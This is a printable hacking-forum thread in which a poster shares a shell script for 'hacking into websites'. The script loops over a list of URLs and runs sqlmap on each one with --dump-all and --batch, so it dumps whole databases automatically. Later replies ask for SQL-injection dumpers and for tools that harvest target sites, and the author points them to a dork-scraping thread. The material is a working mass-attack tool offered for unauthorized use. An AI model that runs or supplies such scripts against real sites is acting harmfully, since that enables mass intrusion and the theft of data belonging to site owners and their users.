Sinisterly
Tutorial Automate Hacking into Websites with SQLMap and Shell Script - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Tutorial Automate Hacking into Websites with SQLMap and Shell Script (/Thread-Tutorial-Automate-Hacking-into-Websites-with-SQLMap-and-Shell-Script)

Pages: 1 2


Automate Hacking into Websites with SQLMap and Shell Script - sunjester - 05-19-2019

1. Just get a list of websites and save them to a file.
2. save this shell script to a file

Code:
#!/bin/sh
#sunjester / https://underwurld.club
#automating sqlmap 
if [ -z $1 ];
then
        echo "specify a file"
        exit
fi

while IFS='' read -r line || [[ -n "$line" ]]; do
        sqlmap -u $line --dump-all --answers="follow=Y" --batch
done < "$1"

3. execute the shell script in your console with the name of the file with the list of websites you saved

(This script will suppress all the questions and may take longer than a normal sqlmap scan.)


RE: Automate Hacking into Websites with SQLMap and Shell Script - roastedtv - 05-19-2019

Do you happen to know a virus-free sqli dumper


RE: Automate Hacking into Websites with SQLMap and Shell Script - sunjester - 05-19-2019

(05-19-2019, 12:10 AM)roastedtv Wrote: Do you happen to know a virus-free sqli dumper

http://sqlmap.org


RE: Automate Hacking into Websites with SQLMap and Shell Script - roastedtv - 05-19-2019

(05-19-2019, 12:11 AM)sunjester Wrote:
(05-19-2019, 12:10 AM)roastedtv Wrote: Do you happen to know a virus-free sqli dumper

http://sqlmap.org

Thanks appreciate it Smile


RE: Automate Hacking into Websites with SQLMap and Shell Script - darkninja1980 - 05-19-2019

nice looking script. thank you for sharing?


RE: Automate Hacking into Websites with SQLMap and Shell Script - Sh1tHappens - 05-19-2019

Thanks for sharing! Do you have a good Method or Tool to grab websites fast and specific?


RE: Automate Hacking into Websites with SQLMap and Shell Script - sunjester - 05-19-2019

(05-19-2019, 10:52 AM)Sh1tHappens Wrote: Thanks for sharing! Do you have a good Method or Tool to grab websites fast and specific?

No but I guess I could write something.


RE: Automate Hacking into Websites with SQLMap and Shell Script - sunjester - 05-19-2019

https://sinister.ly/Thread-get-duckduckgo-urls-from-dorks


RE: Automate Hacking into Websites with SQLMap and Shell Script - Sh1tHappens - 05-19-2019

(05-19-2019, 04:33 PM)sunjester Wrote: https://sinister.ly/Thread-get-duckduckgo-urls-from-dorks

Wow! Thanks for your work, I already post in your other thread.


RE: Automate Hacking into Websites with SQLMap and Shell Script - Drako - 05-20-2019

I actually have sqlmap dowloaded right now on my PC. I've also used it and it works great. Can the Shell script be used on Windows?